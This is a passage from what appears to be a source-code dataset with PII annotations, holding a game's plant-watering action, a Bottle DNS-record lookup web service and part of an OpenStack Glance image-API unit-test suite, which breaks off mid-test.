'platform.sy'], ['URL', 'platform.re'], ['URL', 'platform.no'], ['URL', 'Log.ma'], ['URL', 'Log.ma']] |
21 | # This file is part of Beneath a Binary Sky.
# Copyright (C) 2016, Aidin Gharibnavaz dummy@email.com
#
# Beneath a Binary Sky is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Beneath a Binary Sky is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Beneath a Binary Sky. If not, see
# <http://www.gnu.org/licenses/>.
import time
from actions.action import Action
from actions.exceptions import InvalidArgumentsError, RobotHaveNoWaterError
from world.world import World
from database.exceptions import LockAlreadyAquiredError
class WaterAction(Action):
def __init__(self):
super().__init__()
self._world = World()
def do_action(self, robot, args):
'''Waters the square robot stands on.
@param robot: Instance of `objects.robot.Robot'.
'''
if len(args) != 1:
raise InvalidArgumentsError("`water' action takes no arguments.")
if not robot.get_has_water():
raise RobotHaveNoWaterError("Robot does not carry water.")
try:
square = self._world.get_square(robot.get_location(), for_update=True)
except LockAlreadyAquiredError:
# Waiting a little, and trying one more time.
time.sleep(0.02)
square = self._world.get_square(robot.get_location(), for_update=True)
# Note: we don't raise an exception if there's no plant. A robot can waste its water.
plant = square.get_plant()
if plant is not None:
plant.set_water_level(100)
robot.set_honor(robot.get_honor() + 1)
robot.set_has_water(False)
| 2,047 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016'], ['PERSON', 'Aidin Gharibnavaz'], ['DATE_TIME', 'RobotHaveNoWaterError("Robot'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'actions.ac'], ['URL', 'objects.robot.Ro'], ['URL', 'robot.ge'], ['URL', 'world.ge'], ['URL', 'robot.ge'], ['URL', 'time.sl'], ['URL', 'world.ge'], ['URL', 'robot.ge'], ['URL', 'square.ge'], ['URL', 'plant.se'], ['URL', 'robot.se'], ['URL', 'robot.ge'], ['URL', 'robot.se']] |
22 | #!/usr/bin/env python3
import os, logging, argparse, json, datetime
import requests
import dns.resolver
from bottle import route, request, response, redirect, hook, error, default_app, view, static_file, template
def set_content_type(fn):
def _return_type(*args, **kwargs):
if request.headers.get('Accept') == "application/json":
response.headers['Content-Type'] = 'application/json'
if request.headers.get('Accept') == "text/plain":
response.headers['Content-Type'] = 'text/plain'
if request.method != 'OPTIONS':
return fn(*args, **kwargs)
return _return_type
def enable_cors(fn):
def _enable_cors(*args, **kwargs):
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, OPTIONS'
response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'
if request.method != 'OPTIONS':
return fn(*args, **kwargs)
return _enable_cors
def resolveDomain(domain, recordType, args):
records = []
if args.doh:
try:
payload = {
'name': domain,
'type': recordType
}
data = requests.get("{}".format(args.resolver), params=payload)
for rec in data.json()['Answer']:
records.append(rec['data'])
except:
return records
return records
else:
try:
resolver = dns.resolver.Resolver()
resolver.nameservers = args.resolver.split(',')
if recordType in args.records.split(','):
lookup = resolver.resolve(domain, recordType)
for data in lookup:
if recordType in ['A', 'AAAA']:
records.append(data.address)
elif recordType in ['TXT']:
for rec in data.strings:
records.append(rec.decode("utf-8").replace('"', '').strip())
else:
records.append(str(data).replace('"', '').strip())
return records
except dns.resolver.NXDOMAIN:
return records
except dns.resolver.NoAnswer:
return records
except dns.exception.Timeout:
return records
except dns.resolver.NoNameservers:
return records
@error('404')
@error('403')
def returnError(code, msg, contentType="text/plain"):
response.status = int(code)
response.content_type = contentType
return template('error')
@route('/static/<filepath:path>')
def static(filepath):
return static_file(filepath, root='views/static')
@route('/servers')
def servers():
try:
response.content_type = 'text/plain'
return "\r\n".join(args.resolver.split(","))
except:
return "Unable to open servers file."
@route('/version')
def version():
try:
dirname, filename = os.path.split(os.path.abspath(__file__))
del filename
f = open(os.getenv('VERSION_PATH', dirname + '/.git/refs/heads/master'), 'r')
content = f.read()
response.content_type = 'text/plain'
return content
except:
return "Unable to open version file."
@route('/<record>')
def route_redirect(record):
return redirect("/{}/A".format(record))
@route('/<record>/<type>')
@route('/<record>/<type>.<ext>')
@set_content_type
@enable_cors
def loadRecord(record, type='A', ext='html'):
try:
if record == "":
raise ValueError
if not ext in ["html","txt", "text", "json"]:
raise ValueError
if not type.upper() in args.records.split(','):
raise ValueError
except ValueError:
return returnError(404, "Not Found", "text/html")
if ext in ["json"]:
response.content_type = 'application/json'
if ext in ["txt", "text"]:
response.content_type = 'text/plain'
# We make a request to get information
data = resolveDomain(record, type.upper(), args)
if response.content_type == 'application/json':
return json.dumps({
'results': {
'name': record,
'type': type.upper(),
'records': data,
}
})
elif response.content_type == "text/plain":
return "\r\n".join(data)
else:
return template('rec', {
'name': record,
'type': type.upper(),
'records': data,
'recTypes': args.records.split(',')
})
@route('/', ('GET', 'POST'))
def index():
if request.method == "POST":
recordName = request.forms.get('recordName', '')
recordType = request.forms.get('recordType', '')
if recordName != '' and recordType in args.records.split(','):
return redirect("/{}/{}".format(recordName, recordType))
else:
return returnError(404, "We were not able to figure out what you were asking for", "text/html")
return template("home", {
'recTypes': args.records.split(',')
})
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Server settings
parser.add_argument("-i", "--host", default=os.getenv('HOST', '127.0.0.1'), help="server ip")
parser.add_argument("-p", "--port", default=os.getenv('PORT', 5000), help="server port")
# Redis settings
parser.add_argument("--redis", default=os.getenv('REDIS', 'redis://localhost:6379/0'), help="redis connection string")
# Application settings
parser.add_argument("--doh", help="use DNS-over-HTTPS and treat --resolver as DNS-over-HTTPS capable (beta)", action="store_true")
parser.add_argument("--records", default=os.getenv('RECORDS', "A,AAAA,CAA,CNAME,DS,DNSKEY,MX,NS,NSEC,NSEC3,RRSIG,SOA,TXT"), help="supported records")
parser.add_argument("--resolver", default=os.getenv('RESOLVER', '127.0.0.1'), help="resolver address")
# Verbose mode
parser.add_argument("--verbose", "-v", help="increase output verbosity", action="store_true")
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
try:
app = default_app()
app.run(host=args.host, port=args.port, server='tornado')
except:
log.error("Unable to start server on {}:{}".format(args.host, args.port)) | 5,656 | [['LOCATION', 'json'], ['LOCATION', 'fn(*args'], ['LOCATION', 'fn(*args'], ['PERSON', 'NoAnswer'], ['PERSON', 'dirname'], ['PERSON', 'dirname'], ['PERSON', "@route('/"], ['LOCATION', 'DNSKEY'], ['PERSON', 'help="resolver'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'dns.re'], ['URL', 'request.headers.ge'], ['URL', 'request.headers.ge'], ['URL', 'request.me'], ['URL', 'request.me'], ['URL', 'args.do'], ['URL', 'requests.ge'], ['URL', 'args.re'], ['URL', 'dns.resolver.Re'], ['URL', 'resolver.na'], ['URL', 'args.re'], ['URL', 'args.re'], ['URL', 'resolver.re'], ['URL', 'data.ad'], ['URL', 'data.st'], ['URL', 'rec.de'], ['URL', 'dns.re'], ['URL', 'dns.resolver.No'], ['URL', 'dns.resolver.No'], ['URL', 'response.st'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'f.re'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'request.me'], ['URL', 'request.forms.ge'], ['URL', 'request.forms.ge'], ['URL', 'args.re'], ['URL', 'args.re'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'args.ve'], ['URL', 'logging.ba'], ['URL', 'logging.DE'], ['URL', 'logging.ba'], ['URL', 'logging.IN'], ['URL', 'logging.ge'], ['URL', 'app.ru'], ['URL', 'log.er']] |
23 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# -*- coding: utf-8 -*-
# Copyright 2010-2011 OpenStack, LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import hashlib
import json
import StringIO
from oslo.config import cfg
import routes
import six
import webob
import glance.api
import glance.api.common
from glance.api.v1 import filters
from glance.api.v1 import images
from glance.api.v1 import router
from glance.common import exception
import glance.common.config
import glance.context
from glance.db.sqlalchemy import api as db_api
from glance.db.sqlalchemy import models as db_models
from glance.openstack.common import timeutils
from glance.openstack.common import uuidutils
import glance.store.filesystem
from glance.tests.unit import base
from glance.tests import utils as test_utils
import glance.tests.unit.utils as unit_test_utils
CONF = cfg.CONF
_gen_uuid = uuidutils.generate_uuid
UUID1 = _gen_uuid()
UUID2 = _gen_uuid()
class TestGlanceAPI(base.IsolatedUnitTest):
def setUp(self):
"""Establish a clean test environment"""
super(TestGlanceAPI, self).setUp()
self.mapper = routes.Mapper()
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper))
self.FIXTURES = [
{'id': UUID1,
'name': 'fake image #1',
'status': 'active',
'disk_format': 'ami',
'container_format': 'ami',
'is_public': False,
'created_at': timeutils.utcnow(),
'updated_at': timeutils.utcnow(),
'deleted_at': None,
'deleted': False,
'checksum': None,
'size': 13,
'locations': [{'url': "file:///%s/%s" % (self.test_dir, UUID1),
'metadata': {}}],
'properties': {'type': 'kernel'}},
{'id': UUID2,
'name': 'fake image #2',
'status': 'active',
'disk_format': 'vhd',
'container_format': 'ovf',
'is_public': True,
'created_at': timeutils.utcnow(),
'updated_at': timeutils.utcnow(),
'deleted_at': None,
'deleted': False,
'checksum': 'abc123',
'size': 19,
'locations': [{'url': "file:///%s/%s" % (self.test_dir, UUID2),
'metadata': {}}],
'properties': {}}]
self.context = glance.context.RequestContext(is_admin=True)
db_api.setup_db_env()
db_api.get_engine()
self.destroy_fixtures()
self.create_fixtures()
def tearDown(self):
"""Clear the test environment"""
super(TestGlanceAPI, self).tearDown()
self.destroy_fixtures()
def create_fixtures(self):
for fixture in self.FIXTURES:
db_api.image_create(self.context, fixture)
# We write a fake image file to the filesystem
with open("%s/%s" % (self.test_dir, fixture['id']), 'wb') as image:
image.write("chunk00000remainder")
image.flush()
def destroy_fixtures(self):
# Easiest to just drop the models and re-create them...
db_models.unregister_models(db_api._ENGINE)
db_models.register_models(db_api._ENGINE)
def _do_test_defaulted_format(self, format_key, format_value):
fixture_headers = {'x-image-meta-name': 'defaulted',
'x-image-meta-location': 'http://localhost:0/image',
format_key: format_value}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals(format_value, res_body['disk_format'])
self.assertEquals(format_value, res_body['container_format'])
def test_defaulted_amazon_format(self):
for key in ('x-image-meta-disk-format',
'x-image-meta-container-format'):
for value in ('aki', 'ari', 'ami'):
self._do_test_defaulted_format(key, value)
def test_bad_disk_format(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'invalid',
'x-image-meta-container-format': 'ami',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Invalid disk format' in res.body, res.body)
def test_configured_disk_format_good(self):
self.config(disk_formats=['foo'])
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'foo',
'x-image-meta-container-format': 'bare',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def test_configured_disk_format_bad(self):
self.config(disk_formats=['foo'])
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'bar',
'x-image-meta-container-format': 'bare',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Invalid disk format' in res.body, res.body)
def test_configured_container_format_good(self):
self.config(container_formats=['foo'])
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'raw',
'x-image-meta-container-format': 'foo',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def test_configured_container_format_bad(self):
self.config(container_formats=['foo'])
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'raw',
'x-image-meta-container-format': 'bar',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Invalid container format' in res.body, res.body)
def test_container_and_disk_amazon_format_differs(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'aki',
'x-image-meta-container-format': 'ami'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
expected = ("Invalid mix of disk and container formats. "
"When setting a disk or container format to one of "
"'aki', 'ari', or 'ami', "
"the container and disk formats must match.")
self.assertEquals(res.status_int, 400)
self.assertTrue(expected in res.body, res.body)
def test_create_with_location_no_container_format(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'vhd',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Invalid container format' in res.body)
def test_bad_container_format(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'invalid',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Invalid container format' in res.body)
def test_bad_image_size(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://example.com/image.tar.gz',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-size': 'invalid',
'x-image-meta-container-format': 'bare',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Incoming image size' in res.body)
def test_bad_image_name(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'X' * 256,
'x-image-meta-location': 'http://example.com/image.tar.gz',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'bare',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_no_location_no_image_as_body(self):
"""Tests creates a queued image for no body and no loc header"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('queued', res_body['status'])
image_id = res_body['id']
# Test that we are able to edit the Location field
# per LP Bug #911599
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.headers['x-image-meta-location'] = 'http://localhost:0/images/123'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_body = json.loads(res.body)['image']
# Once the location is set, the image should be activated
# see LP Bug #939484
self.assertEquals('active', res_body['status'])
self.assertFalse('location' in res_body) # location never shown
def test_add_image_no_location_no_content_type(self):
"""Tests creates a queued image for no body and no loc header"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
req.body = "chunk00000remainder"
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_size_header_too_big(self):
"""Tests raises BadRequest for supplied image size that is too big"""
fixture_headers = {'x-image-meta-size': CONF.image_size_cap + 1,
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_size_chunked_data_too_big(self):
self.config(image_size_cap=512)
fixture_headers = {
'x-image-meta-name': 'fake image #3',
'x-image-meta-container_format': 'ami',
'x-image-meta-disk_format': 'ami',
'transfer-encoding': 'chunked',
'content-type': 'application/octet-stream',
}
req = webob.Request.blank("/images")
req.method = 'POST'
req.body_file = StringIO.StringIO('X' * (CONF.image_size_cap + 1))
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 413)
def test_add_image_size_data_too_big(self):
self.config(image_size_cap=512)
fixture_headers = {
'x-image-meta-name': 'fake image #3',
'x-image-meta-container_format': 'ami',
'x-image-meta-disk_format': 'ami',
'content-type': 'application/octet-stream',
}
req = webob.Request.blank("/images")
req.method = 'POST'
req.body = 'X' * (CONF.image_size_cap + 1)
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_size_header_exceed_quota(self):
quota = 500
self.config(user_storage_quota=quota)
fixture_headers = {'x-image-meta-size': quota + 1,
'x-image-meta-name': 'fake image #3',
'x-image-meta-container_format': 'bare',
'x-image-meta-disk_format': 'qcow2',
'content-type': 'application/octet-stream',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.body = 'X' * (quota + 1)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 413)
def test_add_image_size_data_exceed_quota(self):
quota = 500
self.config(user_storage_quota=quota)
fixture_headers = {
'x-image-meta-name': 'fake image #3',
'x-image-meta-container_format': 'bare',
'x-image-meta-disk_format': 'qcow2',
'content-type': 'application/octet-stream',
}
req = webob.Request.blank("/images")
req.method = 'POST'
req.body = 'X' * (quota + 1)
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 413)
def test_add_image_size_data_exceed_quota_readd(self):
quota = 500
self.config(user_storage_quota=quota)
fixture_headers = {
'x-image-meta-name': 'fake image #3',
'x-image-meta-container_format': 'bare',
'x-image-meta-disk_format': 'qcow2',
'content-type': 'application/octet-stream',
}
req = webob.Request.blank("/images")
req.method = 'POST'
req.body = 'X' * (quota + 1)
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 413)
used_size = sum([f['size'] for f in self.FIXTURES])
req = webob.Request.blank("/images")
req.method = 'POST'
req.body = 'X' * (quota - used_size)
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def _add_check_no_url_info(self):
fixture_headers = {'x-image-meta-disk-format': 'ami',
'x-image-meta-container-format': 'ami',
'x-image-meta-size': '0',
'x-image-meta-name': 'empty image'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
res_body = json.loads(res.body)['image']
self.assertFalse('locations' in res_body)
self.assertFalse('direct_url' in res_body)
image_id = res_body['id']
# HEAD empty image
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertFalse('x-image-meta-locations' in res.headers)
self.assertFalse('x-image-meta-direct_url' in res.headers)
def test_add_check_no_url_info_ml(self):
self.config(show_multiple_locations=True)
self._add_check_no_url_info()
def test_add_check_no_url_info_direct_url(self):
self.config(show_image_direct_url=True)
self._add_check_no_url_info()
def test_add_check_no_url_info_both_on(self):
self.config(show_image_direct_url=True)
self.config(show_multiple_locations=True)
self._add_check_no_url_info()
def test_add_check_no_url_info_both_off(self):
self._add_check_no_url_info()
def test_add_image_zero_size(self):
"""Tests creating an active image with explicitly zero size"""
fixture_headers = {'x-image-meta-disk-format': 'ami',
'x-image-meta-container-format': 'ami',
'x-image-meta-size': '0',
'x-image-meta-name': 'empty image'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('active', res_body['status'])
image_id = res_body['id']
# GET empty image
req = webob.Request.blank("/images/%s" % image_id)
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertEqual(len(res.body), 0)
def _do_test_add_image_attribute_mismatch(self, attributes):
fixture_headers = {
'x-image-meta-name': 'fake image #3',
}
fixture_headers.update(attributes)
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "XXXX"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_checksum_mismatch(self):
attributes = {
'x-image-meta-checksum': 'asdf',
}
self._do_test_add_image_attribute_mismatch(attributes)
def test_add_image_size_mismatch(self):
attributes = {
'x-image-meta-size': str(len("XXXX") + 1),
}
self._do_test_add_image_attribute_mismatch(attributes)
def test_add_image_checksum_and_size_mismatch(self):
attributes = {
'x-image-meta-checksum': 'asdf',
'x-image-meta-size': str(len("XXXX") + 1),
}
self._do_test_add_image_attribute_mismatch(attributes)
def test_add_image_bad_store(self):
"""Tests raises BadRequest for invalid store header"""
fixture_headers = {'x-image-meta-store': 'bad',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_basic_file_store(self):
"""Tests to add a basic image in the file store"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
# Test that the Location: header is set to the URI to
# edit the newly-created image, as required by APP.
# See LP Bug #719825
self.assertTrue('location' in res.headers,
"'location' not in response headers.\n"
"res.headerlist = %r" % res.headerlist)
res_body = json.loads(res.body)['image']
self.assertTrue('/images/%s' % res_body['id']
in res.headers['location'])
self.assertEquals('active', res_body['status'])
image_id = res_body['id']
# Test that we are NOT able to edit the Location field
# per LP Bug #911599
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.headers['x-image-meta-location'] = 'http://example.com/images/123'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_unauthorized(self):
rules = {"add_image": '!'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_add_publicize_image_unauthorized(self):
rules = {"add_image": '@', "modify_image": '@',
"publicize_image": '!'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-is-public': 'true',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_add_publicize_image_authorized(self):
rules = {"add_image": '@', "modify_image": '@',
"publicize_image": '@'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-is-public': 'true',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def test_add_copy_from_image_unauthorized(self):
rules = {"add_image": '@', "copy_from": '!'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-glance-api-copy-from': 'http://glance.com/i.ovf',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_add_copy_from_image_authorized(self):
rules = {"add_image": '@', "copy_from": '@'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-glance-api-copy-from': 'http://glance.com/i.ovf',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def test_add_copy_from_with_nonempty_body(self):
"""Tests creates an image from copy-from and nonempty body"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-glance-api-copy-from': 'http://a/b/c.ovf',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F'}
req = webob.Request.blank("/images")
req.headers['Content-Type'] = 'application/octet-stream'
req.method = 'POST'
req.body = "chunk00000remainder"
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_location_with_nonempty_body(self):
"""Tests creates an image from location and nonempty body"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-location': 'http://a/b/c.tar.gz',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F'}
req = webob.Request.blank("/images")
req.headers['Content-Type'] = 'application/octet-stream'
req.method = 'POST'
req.body = "chunk00000remainder"
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_location_with_conflict_image_size(self):
"""Tests creates an image from location and conflict image size"""
self.stubs.Set(glance.api.v1.images, 'get_size_from_backend',
lambda *args, **kwargs: 2)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-location': 'http://a/b/c.tar.gz',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F',
'x-image-meta-size': '1'}
req = webob.Request.blank("/images")
req.headers['Content-Type'] = 'application/octet-stream'
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 409)
def test_add_copy_from_with_location(self):
"""Tests creates an image from copy-from and location"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-glance-api-copy-from': 'http://a/b/c.ovf',
